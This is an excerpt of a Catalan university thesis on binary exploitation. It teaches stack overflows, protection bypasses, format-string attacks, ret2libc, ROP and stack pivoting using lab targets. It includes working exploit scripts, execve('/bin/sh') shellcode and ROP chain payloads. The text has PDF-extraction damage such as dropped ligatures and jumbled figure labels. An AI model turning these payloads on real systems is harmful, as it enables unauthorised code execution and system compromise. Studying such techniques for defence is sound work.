Bufferoverflow

Treball nal de grau
GRAU EN ENGINYERIA INFORMÀTICA

Facultat de Matemàtiques i Informàtica
Universitat de Barcelona
BINARY EXPLOITATION:
Memory corruption
Autor: Oriol Ornaque Blázquez
Director: Raúl Roca Cánovas

Realitzat a: Departament de
Matemàtiques i Informàtica
Barcelona, 20 de juny de 2021

Binary exploitation
Memory corruption
Oriol Ornaque Blázquez
Abstract
Binaries, or programs compiled down to executables, might come with errors or bugs that
could trigger behavior unintended by their authors. By carefully understanding the envi-
ronment where programs get executed, the instructions and the memory, an attacker can
gracefully craft a specic input, tailored to trigger these unintended behaviors and gain
control over the original logic of the program. One of the ways this could be achieved, is by
corrupting critical values in memory.
This works focuses on the main techniques to exploit buer overows and other memory
corruption vulnerabilities to exploit binaries. Also a proof-of-concept for CVE-2021-3156 is
presented with an analysis of its inner workings.
Resum
Els binaris, o programes compilats en executables, poden venir amb errors o bugs que podrien
desencadenar un comportament no previst pels seus autors. Entendre acuradament l'entorn
en el qual s'executen els programes, les instruccions i la memòria, permet a un atacant
elaborar dades d'entrada especíques, adaptades per desencadenar aquests comportaments
no desitjats i obtenir el control sobre la lògica original del programa. Una de les maneres
d'aconseguir-ho és corrompent valors crítics en la memòria del programa.
Aquest treball es centra en les principals tècniques per explotar desbordaments de memòria
i altres vulnerabilitats de corrupció de memòria per a explotar binaris. També es presenta
una prova de concepte, una demostració, de CVE-2021-3156 amb una anàlisi del seu fun-
cionament.
Resumen
Los binarios, o programas compilados en ejecutables, pueden venir con errores o bugs que
podrían desencadenar un comportamiento no previsto por sus autores. Al entender cuida-
dosamente el entorno en el que se ejecutan los programas, las instrucciones y la memoria,
un atacante puede elaborar datos de entrada especícos, adaptados para desencadenas estos
comportamientos no deseados y obtener el control sobre la lógica original del programa. Una
de las formas de conseguirlo es corrompiendo valores críticos en la memoria del programa.
Este trabajo se centra en las principales técnicas para explotar desbordamientos de memoria
y otras vulnerabilidades de corrupción de memoria para explotar binarios. También se
presenta una prueba de concepto, una demostración, de CVE-2021-3156 con un análisis de
su funcionamiento.
2
Contents
1 Stack overows 1
1.1 The stack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.1.1 Stack frame . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.1.2 Overowing the stack . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.2 Basic overow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.3 Shellcode injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2 Stack overow countermeasures 9

2.1 Stack canaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
2.1.1 Check for canaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
2.1.2 Bypassing stack canaries . . . . . . . . . . . . . . . . . . . . . . . . . . 10
2.2 NX/DEP/W⊕X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
2.2.1 Check for NX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
2.3 ASLR/PIE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
2.3.1 Check for ASLR/PIE . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
3 Format strings 13
3.1 Format functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
3.2 Format string vulnerability . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
3.3 Format string exploits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
3.3.1 Arbitrary read . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
3.3.2 Arbitrary write . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
4 Return-oriented programming 19
4.1 ret2libc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
4.2 ROP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
4.2.1 ROP Gadgets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
4.3 Stack pivoting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
4.4 ret2dlresolve . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
4.4.1 Structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
4.4.2 Symbol resolution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
4.5 Sigreturn-oriented programming . . . . . . . . . . . . . . . . . . . . . . . . . 32
4.5.1 Signal handler mechanism . . . . . . . . . . . . . . . . . . . . . . . . . 33
4.5.2 sigcontext struct . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
4.5.3 SROP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
3
4 CONTENTS
5 Heap exploits 37
5.1 The heap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
5.2 glibc malloc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
5.2.1 Common terms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
5.3 Heap overows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
5.4 Use-After-Free . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
5.5 Double free . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
5.6 Unlink . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
6 Fuzzing 45
6.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
6.2 Code coverage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
6.3 Types of fuzzers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
6.3.1 Input seed . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
6.3.2 Input structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
6.3.3 Program knowledge . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
7 Practical case 49
7.1 CVE-2021-3156 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
7.1.1 Weakness . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
7.1.2 Bug . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
7.1.3 Exploitation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
A CVEs and CWEs 57

A.1 CVE Program . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
A.1.1 CVE IDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
A.1.2 CNAs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
A.2 CWE Program . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
Bibliography 63
Chapter 1
Stack overows
1.1 The stack

The most common way for CPUs to implement procedure or subroutine calls is by the means
of a stack[6]. Thanks to its last-in rst-out nature, the stack is a simple and eective solution
when you call a subroutine, you push the address
to keep track of the order of the callings:
of the next instruction onto the stack and once the subroutine has nished executing you
can return where you left by popping the previously pushed address. The address of the next
instruction pushed on the stack is called the return address.
1 void do_something() {
2 do_something_a();
3 // 2
4 do_something_b();
5 // 3
6 }
7
8 int main() {
9 do_something();
10 // 1
11 return 0;
12 }
stack do_something_a() do_something_b()

do_something()
@2 @3
empty @1 @1 @1 @1 @1 empty
time
push @1 push @2 pop @2 push @3 pop @3 pop @1
Figure 1.1: Simplied stack timeline
1
2 Stack overows
This stack coexists in the main memory of the computer along the code and the data and
for Intel x86 and x86_64 CPUs, it is controlled by two registers: the stack pointer and
the base pointer.
1.1.1 Stack frame

The stack holds much more information that just the execution path that the program has
taken. It also holds local variables, the previous base pointer before the call and subroutine
arguments and return values (it may vary between calling conventions).
To group all that data associated with a subroutine call, we use the term stack frame, and
it is composed of the following components (in push order):
1. Parameters of the subroutine. In 64-bit Linux, the default calling convention species
that the rst 5 parameters must be passed on registers instead of the stack.
2. Return address.
3. Locals of the subroutine.
The stack drawed in Figure 1.2 is an example of stack frame for the foo procedure.
1 void foo( int arg ) 1 foo: 0x00...00

2 { 2 push ebp a
3 int a; 3 mov ebp, esp
4 } 4 sub esp, 4
5 5 ... saved bp
6 int main() 6 foo's stack frame

7 { 7 main: saved ip
8 foo(1); 8 ...
9 9 push 1
10 return 0; 10 call foo arg
11 } 11 ... 0xff...ff
Figure 1.2: Standard C 32-bit calling convention stack layout
1.1.2 Overowing the stack

Now that we know that the stack contains a mix of modiable variables and critical data
like the return address comes an important question:
Can we modify the return address? Indeed.

Consider the following stack, Figure 1.3. It has a local variable called buffer that spans for
n bytes. If we ll that buer with n+1 bytes, the excess of 1 byte will overwrite partially
the saved base pointer (bp). To overwrite the return address we just need to ll the buer
with n + sizeof(bp) + sizeof(ip) bytes.
When the processor nishes executing the subroutine, it will pop the return address and
set the instruction pointer register to that value, executing the bytes found at that
address as code. By choosing precise values for the return address we can redirect code
execution wherever we want.
1.2 Basic overow 3
0x00...00
buffer
Writing on buffer
saved bp
saved ip
0xff...ff
Figure 1.3: Buer on the stack
1.2 Basic overow

To do a basic stack overow I recommend using a premade environment with all the pro-
tections disabled to focus on the basic exploit. For this rst example, I will use the virtual
machine Phoenix found at exploit.education, specically the level Stack4 .
1 /* ... */
2 void complete_level() { Win function
3 printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");

4 exit(0);
5 }
6
7 void start_level() {
8 char buffer[64]; Buer on the stack
9 void *ret;
10
11 gets(buffer); Vulnerable function
12
13 ret = __builtin_return_address(0);
14 printf("and will be returning to %p\n", ret);
15 }
16
17 int main(int argc, char **argv) {
18 printf("%s\n", BANNER);
19 start_level();
20 }
Figure 1.4: Stack4@Phoenix
On this level we found a ret2win exercise. The code contains a function win that is never
called but is present on the binary. The goal is to execute that function overwriting the
return address to point to the address of win. In order to achieve the stack overow we need
to input more data than expected so we can overow the buer on the stack and override the
4 Stack overows
return address. There are a few functions in the C Standard Library that do not perform
bounds checking on the input received: in this particular case, we are presented with the
function gets. A quick look into the man page of that function reveals the vulnerability on
the bugs section.
Figure 1.5: man 3 gets: Bugs section
We need to supply gets with the following data:
1. 64 bytes of junk for the buer
2. 8 bytes of junk for the ret local variable
3. 8 bytes of junk for the stack alignment padding[6]
4. 8 bytes of junk for the saved base pointer
5. 8 bytes with the address of complete_level for the return address
To nd the address of complete_level we can use a debugger like gdb.

A simple Python 2.7 script will do the job.
Listing 1.1: stack4_exploit.py
1 exploit = "\x41" * 64 # for the buffer

2 exploit += "\x41" * 8 # for the ret local var
3 exploit += "\x41" * 8 # for stack alignment padding
4 exploit += "\x41" * 8 # for the rbp
5 exploit += "\x1d\x06\x40\x00\x00\x00\x00\x00" # address of complete_level in
little-endian
6 print exploit
And we are done.
Figure 1.6: Exploiting Stack4
Some last thoughts on why that exploit was possible:
We knew in advance the address where complete_level was loaded
No bounds checking was performed on the user input
There was nothing checking the integrity of the stack frame

1.3 Shellcode injection 5
1.3 Shellcode injection

In the last exploit we returned to the win function to solve the challenge. But in the general
case we want to achieve arbitrary code execution, not just returning to the functions
already present in the binary. This can be done by passing as input the machine code of the
instructions we would like to execute and override the return address to point to wherever
we store that machine code, thus injecting and executing the shellcode. Take a look at the
next exercise: Stack5 from the Phoenix VM.
1 /* ... */
2
3 void start_level() {
4 char buffer[128];
5 gets(buffer);
6 }
7
9 printf("%s\n", BANNER);
10 start_level();
11 }
The program is very similar to the Stack4 : a buer on the stack and a call to gets, that we
know is vulnerable to overows. On the last exploit, almost all of our input was just junk
bytes. In this exploit, we are going to use that junk space to store the shellcode and the
return address will point to the start of the shellcode.
If the last exploit was called ret2win because we returned to the win function this exploit
could be named ret2stack or ret2buer because we will be returning to the buer on the
stack.
You could assemble your own shellcode manually, but I am going to use this shellcode found
at shell-storm.org that performs an execve("/bin/sh").
The format of the input to gets will be:
1. 27 bytes of shellcode
2. 128 − len(shellcode) bytes of NOPs to ll the buer
3. 8 bytes of NOPs for the saved base pointer
4. 8 bytes with the address of the start of the buer, where our shellcode is located
We will change the junk bytes with NOP opcodes (0x90) because we are now executing
instructions on the stack. If the CPU starts executing and nds random bytes, it will
launch an invalid opcode exception and kill the process. In this particular case it does not
matter because the shellcode is at the beginning and the execve will replace the process
image with the one from /bin/sh, including the stack but while you are debugging the
shellcode and the exploit they can be essential.
In my gdb debugging session I found the address of the start of the buer to be 0x7fffffffe490,
and so I plugged that number into my exploit script.
1 exploit = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48"\
2 "\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
3 exploit += "\x90" * (128 - len(exploit))
6 Stack overows
4 exploit += "\x90" * 8
5 exploit += "\x90\xe4\xff\xff\xff\x7f\x00\x00"
6 print exploit
Inside the debugger the script worked, but outside it failed. Taking a closer look into the
error we can see that the value for the rsp register once we returned from start_level is
dierent from the value it had inside the debugger. This oset causes us to jump to a wrong
address and instead of our shellcode the CPU is trying to execute random bytes and thus,
provoking an illegal opcode trap. We have to account for that dierence in our script.
0x7fffffffe490
Debugged process Shellcode gdb env
Normal process Shellcode
0x7fffffffe4e0
Figure 1.7: Stack osets between debugged process and non debugged process
0x...570 − 0x...520 = 0x50

We have to add this oset to the start of the buer, 0x...490.
0x...490 + 0x50 = 0x...4e0

This problem did not happen in the last challenge because we were not returning to the
stack but to a function in the binary.
Listing 1.2: stack5_exploit.py
1 exploit = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48"\
2 "\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
1.3 Shellcode injection 7
3 exploit += "\x90" * (128 - len(exploit))

4 exploit += "\x90" * 8
5 exploit += "\xe0\xe4\xff\xff\xff\x7f\x00\x00"
6 print exploit
One last thing. The shell runs in interactive mode by default and it expects to be connected
to stdin. If you do not redirect standard input to the shell, it will close automatically
upon start, so you need to concatenate the python output with standard input and pass
everything to the executable.
Some thoughts on why this exploit was possible:
We knew in advance the address of the buer on the stack.
No bounds checking was performed on the user input.
There was nothing checking the integrity of the stack frame.
We could execute instructions stored on the stack.

8 Stack overows
Chapter 2
Stack overow countermeasures
2.1 Stack canaries

Stack canaries are secret values placed between local buers and the return ad-
dress. This value is checked before a function returns and if the value has changed, that
means that it has been overwritten and the return address may be overwritten too, possibly
indicating a stack overow attack. When that situation happens, the program automatically
exits to prevent the stack overow. The value of the canary is changed every time the
program starts to make it unpredictable.
This countermeasure is design to check for the stack frame integrity, detecting when a
possible stack overow has occurred.
buer canary saved bp saved ip
Figure 2.1: Stack canary
Figure 2.2: foo function without and with stack canary
Checking for a value every time a function returns comes with a performance penalty and for
that reason compilers allow opting out from using stack canaries. Compilers usually compile
with stack protectors by default. To compile a program without stack canaries in gcc use
the -fno-stack-protector option. Some compilers have options to specify which functions
9
10 Stack overow countermeasures
you want to be compiled with stack canaries to achieve a trade-o between performance and
security.
Figure 2.3: man gcc
2.1.1 Check for canaries

To check for the existence of canaries on a binary we can take a look at the disassembled
code or we can search for the symbol __stack_chk_fail[8], the function that checks the
canary integrity.
1 readelf -s a.out | grep -q '__stack_chk_fail'
2.1.2 Bypassing stack canaries

Leaking the stack canary
Stack canaries are not bulletproof though and can be bypassed. If you include the stack
canary value in your input when you overow the stack the canary checking function will
not detect the stack overow. Note that the canary value in the input must align with the
canary value in the stack. So to bypass the canary we need to know its value, a value that
changes every time the binary is executed. If we could make the binary reveal its contents
in runtime we could read the canary value. We have to leak it (see subsection 3.3.1).
Bruteforcing the stack canary
There is also a bruteforce approach to processes that use the fork function for POSIX
systems. fork copies the hole process image from the parent to the child, stack canaries
included. Therefore, the canaries are the same for both the child and the parent. This is
useful for programs like web servers that use fork to handle the incoming connections. The
bruteforce approach consist of leaking the canary one byte at the time.
Listing 2.1: Pseudocode for bruteforcing a canary in a fork program
1 uint8_t canary[STACK_CANARY_WIDTH];
2
3 for(int i = 0; i < STACK_CANARY_WIDTH; ++i)
4 {
2.2 NX/DEP/W⊕X 11
5 for(int j = 0; j < 256; ++j)

6 {
7 canary[i] = j;
8 send(buffer + canary[:i+1]); /* only send the first i bytes of the
canary */
9 if(!fork_child_crashed)
10 break;
11 }
12 }
This algorithm reduces the entropy space from 256STACK_CANARY_WIDTH to 256×STACK_CANARY_WIDTH.
Bypass using Exception Handling

Another technique to bypass stack canaries consist of triggering an exception before the
canary is checked. If the attacker can overwrite an exception handler structure and trigger
the exception a SEH based stack overow exploit could be executed.[9]
Replace the canary value

Replace the authoritative canary value in the .data section of the program. Because the
canary is computed at runtime the section where it resides must be marked as writable. To
use this technique an arbitrary write is needed.
Arbitrary writes
An arbitrary write implies the ability to write an arbitrary value to an arbitrary memory
location marked as writable. This means that we can write values on addresses that are not
contiguous to our overow, giving us the possibility to overwrite the return address without
having to overwrite the stack canary.
2.2 NX/DEP/W⊕X
NX is a protection that marks a memory region as non-executable. Dierent operating
systems and architectures present dierent mechanism to implement the same concept. On
Microsoft Windows it is called Data Execution Protection. On BSD systems it is called
write ⊕ execute, refering to the rule that no memory section should be marked as writable
and executable at the same time. The terms can, and they will, be used interchangeably.
On the previous exploit we returned to the stack where we loaded instructions. Now, if the
stack is marked as non-executable, those instructions on the stack cannot be executed: the
CPU will throw an exception.
2.2.1 Check for NX

To check for this security feature on a binary we can take a look at the permissions of the
section where the stack will be loaded[8]. Again, this depends on the compiler, the OS and
the architecture.
1 readelf -W -l a.out | grep 'GNU_STACK'

12 Stack overow countermeasures
2.3 ASLR/PIE
ASLR is the acronym of Address Space Layout Randomization. It is a feature that ran-
domizes the location of the libraries on the process memory, rendering useless attacks with
hardcoded addresses, like our second exploit.
Every time an executable is launched, the OS needs to create the process memory space and
the loader loads the dynamic libraries the process requires on certain addresses. Conven-
tionally, those addresses were resolved at compile time and were included on the executable.
The executable format contains indications for the OS on how to create its process and
where it expects the libraries to be located. That caused that the addresses of the libraries
where known and predictable. To make them harder to exploit, the kernel randomizes the
location of those libraries every time the executable is executed.
To compile a program without ASLR/PIE support on gcc use the no-PIE option.
2.3.1 Check for ASLR/PIE

For ASLR to work, the operating system needs to support it and applications must be
compiled with ASLR in mind. Because the load locations are unknown at compile time, the
compiler needs to create a Position Independent Code or Executable. To check if the OS
has ASLR enabled:
1 cat /proc/sys/kernel/randomize_va_space
2 # 0 = Disabled
3 # 1 = Conservative randomization
4 # 2 = Full randomization
To check if a binary has been compiled with ASLR support[8]:
1 readelf -h a.out | grep "DYN"
Additionally, in Linux systems we can use the LD_TRACE_LOADED_OBJECTS environment vari-

able to modify the behavior of the loader, which prints out the dynamic library dependencies
and their addresses where they were loaded at runtime. In systems with ASLR enabled, those
addresses will be dierent each time the same command is executed. In systems where ASLR
is disabled, the addresses will always be the same.
Figure 2.4: libc base address loaded at runtime with ASLR enabled/disabled
Chapter 3
Format strings
3.1 Format functions

C uses the concept of format strings to specify some functions how their arguments should
be treated. Those functions are unique in the way they use a variable number of arguments,
as opposed to the xed number of arguments normal functions have in statically typed
languages like C. The format string indicates the function how to interpret the arguments
received. Some examples of this type of functions are:
printf (fprintf, sprintf, vsnprintf, ...)
scanf (sscanf, fscanf, vfscanf, ...)
These functions are often used to perform input/output with the user. They are conversion
functions, representing primitive C data types in a human-readable string representation
and vice versa. Vulnerabilities on input/output functions for a program are a recurrent
theme in cybersecurity. The format strings are a critical component of the function as they
dictate how the arguments should be processed.
Conversion specier Meaning

Takes an int from the stack and converts it to signed
d
decimal notation
Takes an unsigned int from the stack and converts
x
it to hex
Takes a void* from the stack and prints it as a hex
p
address
Dereferences a const char* on the stack and reads
s
until null byte
Dereferences an int* on the stack and writes the
n
number of characters written so far
Table 3.1: Common format conversion speciers table
13
14 Format strings
1 int arg1, arg2, arg4;

2 char* arg3 = "Hello world";
3 printf("%x %d %s %n\n", arg1, arg2, arg3, &arg4);
0x0...0 locals
rbp
Internal pointer rip
from where the Address of format string
format function
arg1
will start matching
arguments with the arg2
format string arg3
0xf...f Address of arg4
Figure 3.1: Format function stack frame
The format function uses an internal pointer to know which argument corresponds with the
conversion specied on the format string. This pointer increases as the function parses the
format string.
3.2 Format string vulnerability

If the format string can somehow be provided by the user, an attacker wins control over
the behavior of the format function. Therefore, if an attacker is able to provide the
format string a format string vulnerability is present.
1 int main(int argc, char* argv[]){

2 if(argc != 2) return 1;
3
4 printf(argv[1]); Format string vulnerability
5
6 return 0;
7 }
Figure 3.2: Format string vulnerability
3.3 Format string exploits

3.3.1 Arbitrary read
By using the %s conversion specier we can read from an address stored on the stack. If the
input buer we use is a stack allocated buer, we can put any address we want to examine
3.3 Format string exploits 15
on that buer and create an appropriate input so when the format function parses the %s
specier it uses our address on the buer.
rbp
rip
1 int main() printf's stack frame
2 { buffer's address
3 int dummy; dummy

4 char buffer[] = dummy
5 "AAAAAAAA %x %x %s ";
6
0x41 0x41 ...
7 printf(buffer, dummy);
8
buffer main's stack frame
9 return 0;
10 }
rbp
rip
Figure 3.3: Anatomy of an arbitrary read format string exploit
The %xs speciers are used to make printf's internal pointer to the arguments point to a
specic oset, in this case, to our buer. By adding more %xs we can point further down on
the stack (higher addresses) and by removing them we point upwards (lower addresses).
When %s is parsed, it dereferences the address pointed by the printf's internal pointer.
Thanks to our padding of %xs we made it point to the buer, where we carefully placed the
address we want to read from: 0x4141414141414141.
Can be used to leak a stack canary.
Example
In this exercise we are going to read the value of the variable s3cr3t that it is not allocated
on the stack. To accomplish this task, we need to input the address of s3cr3t on the start
of the buer followed by format speciers.
Listing 3.1: exploit.py
1 exploit = "\x08\x90\x55\x56" # address of s3cr3t

2 exploit += "_%08x" * 6
3 exploit += "_%08s"
4 print exploit
1 $ python2 exploit.py > qwe

2 $ ./a.out qwe > asd
As printf parses the format string, the extra format speciers will make the internal pointer
point to the start of the buer, where we carefully stored the address of our target.
16 Format strings
Figure 3.4: Address of s3cr3t on the input buer
The next "%s" will read the address and treat as a pointer, dereferencing the address and
printing the value.
Figure 3.5: Value of s3cr3t leaked
3.3.2 Arbitrary write

We can employ the same technique from the arbitrary read to overwrite arbitrary memory
but instead of using the %s specier we use the %n specier, which writes back to an address.
The %n writes the number of bytes written so far. To control that number we can make use
of padding and size modiers.
Example
To showcase an arbitrary write from a format string I am going to overwrite the return
address without aecting the stack canary. I want to return to the win function that will
print out win on the screen when executed. This function is called nowhere on the original
code. Compile the code with stack canaries enabled.
Figure 3.6: Compiled with stack canaries
Like in the arbitrary read, the rst value we put on the input buer is the address where
printf should write to, that is, the address of our return address on the stack. In this
particular case I inserted multiple times the address of the buer in an eort to make the
exploit more reliable against stack osets. The address is then followed by a pad of format
speciers to align the %n specier with the address at the start of the buer.
3.3 Format string exploits 17
Now we need to indicate the value we want to write on the selected address. Because %n
writes back the number of characters already printed, we can use padding in one of the
format speciers to make it print x characters. The address of win is 0x8049256. To write
that value with %n, printf needs to print 134517334 characters minus the previously printed,
like the address and the padding format speciers.
After the calculation, the number of characters left to print is 134517192.
1 #exploit = "\x41\x41\x41\x41" * 8
2 exploit = "\x9c\xd0\xff\xff" * 8 # Address of return address
3 exploit += "_%08x" * 12
4 exploit += "_%134517192c"
5 exploit += "_%n"
6 print exploit
It is important to unset certain environment variables that could move the stack up
and down and make the exploit inconsistent. Running the exploit we execute win().
Figure 3.7: win() function executed.

18 Format strings
Chapter 4
Return-oriented programming
4.1 ret2libc
In a traditional stack overow we try to return to some shellcode in a buer we can control.
For this reason, a countermeasure appeared to prevent execution on writable segments (see
2.2). With this limitation, we cannot inject code anymore. The solution comes from reusing
the existing code to achieve our goals, like in the ret2win example (see 1.2). Libc is a
library loaded on almost all processes, so returning to a function inside libc is always an
option. Furthermore, libc declares system, a very well suited win function.
To perform the call to system we need to prepare the stack with the parameters that the
compiler would set for a compiled call to system:
1 int system(const char* command);
We require the address of command to be present on the stack, before (higher addresses) the
overwritten return address.
buffer
ebp
Address of system
Address of command
Figure 4.1: ret2libc stack layout
Example
For this example we will use a custom vulnerable 32bit program compiled with all the
protections disabled, with no debugging symbols and ASLR turned o for the operating
system.
19
20 Return-oriented programming
Listing 4.1: example.c
1 #include <stdio.h>
2 #include <stdlib.h>
3
4 void vuln()
5 {
6 char buffer[64];
7 fgets(buffer, 128, stdin);
8 }
9
10 /* gcc -m32 -fno-stack-protector -no-pie (-m32) main.c */
11 /* ASLR disabled on host */
12 int main()
13 {
14 vuln();
15 return 0;
16 }
Using our layout for a ret2libc exploit we need to plug in the addresses of the system function
and a "/bin/sh" string. Because the binary was compiled with no debugging symbols we
can't search for the symbol inside gdb or another debugger. But because ASLR is disabled,
we know where libc will be loaded. We could get the oset of system from the libc base
address to know where it will be located at runtime.
Figure 4.2: libc base address
Figure 4.3: system oset from libc base address
Figure 4.4: "/bin/sh" string oset from libc base address
Knowing all those addresses we can plug them into a python script taking into account how
the stack will unwind and what system expects to be on the stack.
1 exploit = "\x41" * 76
2 exploit += "\x30\xc8\xe0\xf7" # system address
4.2 ROP 21
3 exploit += "\x00" * 4 # padding

4 exploit += "\x52\x93\xf5\xf7" # /bin/sh address
5 print exploit
Once we crafted the exploit we need to concatenate it with stdin to obtain access to the
shell (see 1.3).
Figure 4.5: ret2libc exploit
When compiling a binary for 64bits, the default calling convention used by gcc in Linux
systems is the System V AMD64 ABI, which species that the rst 6 parameters (integers
or pointers) are passed in registers instead of being pushed on the stack. That represents a
problem for our ret2libc technique, as we only control the stack.
To overcome this issue we will use return-oriented programming, the generalized and rened
form of a ret2anything exploit.
4.2 ROP
Return-oriented programming is a programming paradigm by which an attacker can in-
duce arbitrary behavior in a program without code injection. This defeats the coun-
termeasure of NX/DEP/W⊕X.
This technique presents a whole new programming paradigm (an esoteric one): using the
code of a existing program to create another program inside the process, by means of con-
catenating return addresses and a stack overow.
In a typical stack overow, we override the return stack writing only one address.
4.2.1 ROP Gadgets

ROP Gadgets are machine code snippets that end with a ret instruction. We can chain them
together by pushing their start addresses in sequence on a stack overow attack, creating a
ROP chain.
Stack
0x4a0f:
syscall; ret buffer
0xf0fee:
mov 1, eax; ret
rbp
0x1007f: 0x4045c
mov 0, rsi; ret
0xf0fee
0x4045c: 0x75a0
xor rax, rax; ret
0x7fffffff5e70
0x75a0: 0x1007f
pop rdi; ret
.text 0x4a0f
Figure 4.6: ROP chain
Example
We will use the same program for the ret2libc example, but compiled for 64bit. Because of
the default calling convention for 64bit gcc binaries on Linux, we need to pass the "/bin/sh"
string pointer in the register rdi. To accomplish this, we will search for gadgets on the
binary.
Because we control the stack thanks to the stack overow, we could use a pop rdi instruction
to put our pointer into the register.
Figure 4.7: ROP gadget pop rdi; ret
In this case we also need a NOP gadget to achieve stack alignment. This gadget does nothing
more than calling the following gadget on the chain and with this addition our whole rop
chain is 32 bytes long, which is aligned for the 16 byte stack. If this gadget was omitted,
the rop chain would be 24 bytes long, which is not divisible by 16 and therefore, would not
be aligned.
Figure 4.8: NOP gadget
Before calling system we have to set up the string pointer in rdi, so this gadget will be the
rst we will return to, followed by the address of "/bin/sh" and the address of system.
4.2 ROP 23
buffer
rbp
Address of nop gadget
Address of pop rdi gadget
Address of "/bin/sh"
Address of system
Figure 4.9: Stack layout for example
We collect again the addresses of interest because we are now using the 64bit libc.
Figure 4.10: libc base address at runtime
Figure 4.11: system oset from libc base address
Figure 4.12: "/bin/sh" oset from libc base address
Listing 4.3: exploit64.py
1 exploit = "\x41" * 72
2 exploit += "\xaf\x10\x40\x00\x00\x00\x00\x00" # nop gadget for stack alignment
3 exploit += "\xe3\x11\x40\x00\x00\x00\x00\x00" # pop rdi gadget
4 exploit += "\xaa\x95\xf7\xf7\xff\x7f\x00\x00" # binsh
5 exploit += "\x10\x74\xe1\xf7\xff\x7f\x00\x00" # system
6 print exploit
Again, to keep the shell open we need to concatenate the exploit with stdin.
Figure 4.13: Successful exploitation of the rop chain
4.3 Stack pivoting

A stack pivot attack consist of creating a fake stack somewhere in memory and tricking the
program to use it as its stack. This technique is useful when the legitimate stack lacks space
for a ROP chain.
For this attack it is necessary to control the stack pointer register to be able to change the
stack of the program for the attacker controlled one. To accomplish this, we need to nd
some gadgets:
1. pop rsp. Ideal gadget in theory. Hardly found in any executable.
2. xchg reg, rsp. Used in combination with pop reg to write a value on reg to later
exchange it with rsp. Requires 16 bytes of stack space after the return address.
3. leave; ret. All functions except main are ended with leave; ret. That makes this
case the most plausible. The leave instruction is equivalent to:
1 mov rsp, rbp
2 pop rbp
If we call leave two consecutive times, the rst pop rbp will be used to set rsp on
the second leave.
buffer
Address of fake stack
Address of leave
Figure 4.14: Stack layout for a stack pivoting attack
Example
In this exercise the objective is to pivot the stack to buffer. I will use the leave gadget to
trigger the pivot.
4.3 Stack pivoting 25
First, we need the leave gadget.
Figure 4.15: leave gadget
The address shown in Figure 4.15 is only an oset from the base address of the binary. To
make it usable add it to the base address.
Once we pivoted the stack, on the leave gadget, the following ret instruction will pop from
buffer the return address. In this case, I lled it with the address of win so at the end, we
will jump to that function.
1 padding = 72
2 exploit += "\xed\x61\x55\x56" * 18 # address of win
3 exploit += "\x90\xd0\xff\xff" # address of buffer
4 exploit += "\x31\x61\x55\x56" # leave gadget
5 print exploit
With this exploit, the sequence of instructions we want to execute is the following.
1 mov esp, ebp

2 pop ebp &buffer
3 ret leave gadget
4 mov esp, ebp Stack pivoting
5 pop ebp First 4 bytes of buffer
6 ret &win
Figure 4.16: Stack pivoting example: instruction sequence
Setting a breakpoint on win we can see that now, the esp register points to the user supplied
buer. We have pivoted the stack.
Figure 4.17: esp points to buffer
Figure 4.18: Succesful exploitation
